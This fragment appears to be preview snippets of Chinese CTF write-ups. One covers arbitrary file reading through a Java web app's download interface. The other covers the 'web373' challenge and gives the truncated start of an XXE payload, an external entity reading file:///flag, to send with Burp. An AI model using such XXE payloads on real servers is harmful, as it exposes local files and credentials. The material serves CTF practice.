文件读取有一个文件下载的接口
然后测试读取文件.
web目录下的树状图
12345678910111213141516171819202122E:\CODE\JAVA\JAVAWEB\FIRSTWEB\WEB│ checkbox.jsp│ hello.jsp│ index.jsp│ message.jsp│ ......
web373用burp post下面的数据
12345<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///flag"&g ......